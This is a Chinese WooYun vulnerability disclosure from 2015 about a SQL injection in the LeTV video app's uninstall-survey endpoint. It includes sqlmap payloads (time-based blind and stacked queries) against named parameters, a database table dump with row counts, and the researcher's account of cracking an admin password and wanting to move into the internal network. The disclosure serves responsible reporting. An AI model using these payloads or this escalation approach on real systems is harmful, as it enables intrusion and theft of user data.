当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133394

漏洞标题:视频网站安全之乐视视频APP高危SQL注入漏洞(管理员账户密码\百万级用户数据)

相关厂商:乐视网

漏洞作者: HackBraid

提交时间:2015-08-11 17:27

修复时间:2015-09-25 19:02

公开时间:2015-09-25 19:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-11: 细节已通知厂商并且等待厂商处理中
2015-08-11: 厂商已经确认,细节仅向厂商公开
2015-08-21: 细节向核心白帽子及相关领域专家公开
2015-08-31: 细节向普通白帽子公开
2015-09-10: 细节向实习白帽子公开
2015-09-25: 细节向公众公开

简要描述:

APP-通过网络包捕获方式挖掘不到的一处注入点

详细说明:

#01 起源
正常的使用adb查看乐视视频app的配置文件,发现卸载的配置文件有个url

letv.jpg


打开连接发现是卸载乐视视频后的问卷调查
http://upload.app.m.letv.com/android/static/uninstall_question.html?pcode=010110106

letv0.png


抓包,POST型注入
#02 POST型注入
多个参数均可注入

letv1.jpg


mclient表包含百万级的用户数据

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: selectid
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: devid=&model=&os=&deldate=&accesstype=&key=c652145a510fda82a7061b4935a75622&contact=1&selectid=1' AND SLEEP(5) AND 'Vywy'='Vywy&feedback=1
Place: POST
Parameter: feedback
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: devid=&model=&os=&deldate=&accesstype=&key=c652145a510fda82a7061b4935a75622&contact=1&selectid=1&feedback=1' AND SLEEP(5) AND 'UXJF'='UXJF
Place: GET
Parameter: version
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: mod=mob&ctl=deleteReport&act=report&pcode=010110106&version='); SELECT SLEEP(5)-- 
Place: POST
Parameter: contact
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: devid=&model=&os=&deldate=&accesstype=&key=c652145a510fda82a7061b4935a75622&contact=1' AND SLEEP(5) AND 'feTz'='feTz&selectid=1&feedback=1
Place: GET
Parameter: pcode
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: mod=mob&ctl=deleteReport&act=report&pcode=010110106' AND SLEEP(5) AND 'QplN'='QplN&version=
---
web application technology: Nginx, PHP 5.4.4
back-end DBMS: MySQL 5.0.11
Database: mclient
+-------------------------------+---------+
| Table                         | Entries |
+-------------------------------+---------+
| mclient_newuser_activity      | 1267477 |
| mclient_ptdownload            | 887617  |
| mclient_clear_cache           | 808801  |
| mclient_mzmessage             | 679375  |
| mclient_advshike              | 499037  |
| mclient_booklive              | 469463  |
| mclient_netstat               | 394139  |
| mclient_advdianle             | 344674  |
| mclient_user_activity         | 343593  |
| mclient_advym                 | 337831  |
| mclient_deleteReport          | 300988  |
| mclient_mmsupdate             | 164336  |
| mclient_advjuzhang            | 116662  |
| sp_subscribe_match            | 111947  |
| mclient_statinfot             | 96874   |
| mclient_apkdownloadnew        | 91374   |
| sp_my_team                    | 83358   |
| mclient_advzshd               | 76915   |
| mclient_advdianru             | 71932   |
| sp_ios_dev_info               | 69007   |
| mclient_productversion        | 66579   |
| stat_app_m_logs               | 65645   |
| mclient_statinfo_reg          | 62588   |
| mclient_statinfo_uv           | 61988   |
| iphone_91_devid               | 56781   |
| mclient_statinfo_act          | 52409   |
| mclient_iosdevice_new         | 41095   |
| mclient_statinfo_eff          | 40786   |
| stat_muser_channel_info       | 35820   |
| mclient_mz_favorite_message   | 32305   |
| mclient_attachment            | 30820   |
| mclient_apkdownloadt          | 23025   |
| TB_USERORDER                  | 19871   |
| mclient_offlinepay            | 14028   |
| mclient_reply                 | 12690   |
| mob_apk                       | 5603    |
| mclient_mobile_pic            | 5392    |
| stat_muser_info               | 4829    |
| mclient_apk_down              | 3924    |
| stat_muser_buildin_info       | 3615    |
| mp4_url_not_exist             | 3386    |
| mclient_config                | 3133    |
| app_rank                      | 3012    |
| sp_match_schedule             | 2912    |
| sp_live_info_new              | 2884    |
| sp_subscribe_setting          | 2146    |
| mclient_advyijifen            | 2045    |
| dc_ding_can                   | 1742    |
| mclient_appversion            | 1615    |
| mclient_user                  | 1372    |
| sp_team_icon                  | 1252    |
| mclient_album_push_log        | 1091    |
| sp_original_video             | 1085    |
| mclient_apppartner            | 1028    |
| mclient_saleactive            | 938     |
| mclient_live_recommend        | 911     |
| hd_activity_user              | 753     |
| mclient_dataprivs             | 701     |
| mclient_exclusivevideo        | 682     |
| mclient_data                  | 651     |
| mclient_weibouser             | 644     |
| mclient_mmsupdate_csv         | 638     |
| mclient_newuser_guide_pcode   | 635     |
| mclient_pushmessage           | 594     |
| mclient_pushmsg               | 518     |
| mclient_offlinevideo          | 509     |
| mclient_nativemodel           | 351     |
| mclient_statinfo_partner      | 321     |
| mclient_menu                  | 306     |
| mclient_channel               | 291     |
| mclient_menu_copy             | 226     |
| mclient_mvstory               | 221     |
| mclient_category              | 209     |
| mclient_vip_albums            | 208     |
| sp_table                      | 194     |
| mclient_pushpic               | 189     |
| mclient_exchange              | 173     |
| mclient_starrank              | 154     |
| mclient_data_copy             | 152     |
| mclient_area                  | 113     |
| mclient_advdelong             | 109     |
| mclient_friendsites           | 97      |
| mclient_year                  | 97      |
| stat_code                     | 94      |
| TB_IPNUMBER_SEGMENT           | 94      |
| mclient_exchange_hidden       | 92      |
| mclient_homeblock_items       | 92      |
| TB_IPNUMBER_SEGMENT_old       | 75      |
| mclient_partner               | 71      |
| mclient_software              | 69      |
| mclient_mvalbum               | 62      |
| mclient_log                   | 59      |
| mclient_platform_version      | 55      |
| mclient_newuser_guide_version | 54      |
| mclient_vip_activity          | 52      |
| mclient_act                   | 47      |
| sp_basketball_table           | 42      |
| mclient_homeblock             | 41      |
| mclient_cachelist             | 27      |
| mclient_token_wl              | 22      |
| mclient_channel_info          | 21      |
| sp_video_type                 | 21      |
| mclient_exchange_channel      | 19      |
| mclient_app_channel           | 17      |
| mclient_app                   | 16      |
| mclient_floatball             | 16      |
| mclient_keyvalue              | 16      |
| mclient_h265                  | 15      |
| mclient_platform_down         | 14      |
| sp_match_type                 | 14      |
| mclient_productline           | 13      |
| mclient_group                 | 11      |
| sp_group_name                 | 11      |
| mclient_forbidden_aids        | 10      |
| mclient_setup                 | 10      |
| mclient_department            | 9       |
| mclient_device                | 8       |
| mclient_devicemodel_down      | 8       |
| mclient_platform              | 8       |
| mclient_spread                | 8       |
| sp_original_column            | 8       |
| mclient_advrehulu             | 7       |
| mclient_homeblock_template    | 7       |
| mclient_vipactive_activity    | 6       |
| mclient_advjyq                | 5       |
| mclient_newuser_guide         | 5       |
| mclient_vip_product           | 5       |
| mclient_appversion_link       | 4       |
| mclient_message               | 4       |
| `user`                        | 3       |
| mclient_advduomeng            | 3       |
| mclient_devicetype            | 3       |
| mclient_sites                 | 3       |
| user_role                     | 3       |
| mclient_datarecname           | 2       |
| mclient_devicemodel           | 2       |
| mclient_homefocus             | 2       |
| mclient_producttype           | 2       |
| mclient_usertype              | 2       |
| role                          | 2       |
| sp_shooter_table              | 2       |
| mclient_advfz                 | 1       |
| mclient_notice_history        | 1       |
| mclient_substitution          | 1       |
| vrs_album                     | 1       |
+-------------------------------+---------+


#03 管理员账户
获取管理员账户并破解得到密码

letv2.jpg


无奈http://upload.app.m.letv.com/android/admin---》http://sys.m.letv.com:31000/index.php?/default/login/login在内网,mail和vpn也暂时访问不了,要不然漫游~

漏洞证明:

null

修复方案:

注入点过滤

版权声明:转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-08-11 19:01

厂商回复:

感谢HackBraid提交该问题,问题已确认,已通知业务部门修复!

最新状态:

暂无

漏洞评价:

评论

  1. 2015-08-11 17:53 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    你丫的~!

  2. 2015-08-11 17:53 | 蓝冰 ( 核心白帽子 | Rank:627 漏洞数:50 | -.-)

    师傅~

  3. 2015-08-11 18:06 | 李叫兽就四李叫兽 ( 路人 | Rank:23 漏洞数:14 | 啦啦啦啦)

    大腿,求教!!

  4. 2015-08-11 18:13 | 从容 ( 普通白帽子 | Rank:221 漏洞数:75 | Enjoy Hacking Just Because It's Fun :) ...)

    你丫的~!

  5. 2015-08-11 18:22 | pyphrb ( 实习白帽子 | Rank:47 漏洞数:6 | ...........................................)

    你丫的,我给你找妹

  6. 2015-08-11 20:01 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    @寂寞的瘦子 @从容 @pyphrb - -!要记住一句话:PHP是最好的语言,没有之一

  7. 2015-08-11 20:02 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    @蓝冰你是我师傅

  8. 2015-08-12 10:14 | xiaoL ( 普通白帽子 | Rank:361 漏洞数:67 | PKAV技术宅社区!Blog:http://www.xlixli....)

    @HackBraid 你丫的,又在宣传我大PHP!

  9. 2015-08-12 10:36 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    @xiaoL - -!

  10. 2015-08-12 11:52 | 带我玩 ( 路人 | Rank:12 漏洞数:6 | 带我玩)

    给我点vip

  11. 2015-08-13 18:42 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    ..难道重复了。。。

  12. 2015-08-13 18:44 | 从容 ( 普通白帽子 | Rank:221 漏洞数:75 | Enjoy Hacking Just Because It's Fun :) ...)

    APP-通过网络包捕获方式挖掘不到的一处注入点 挖掘不到的?……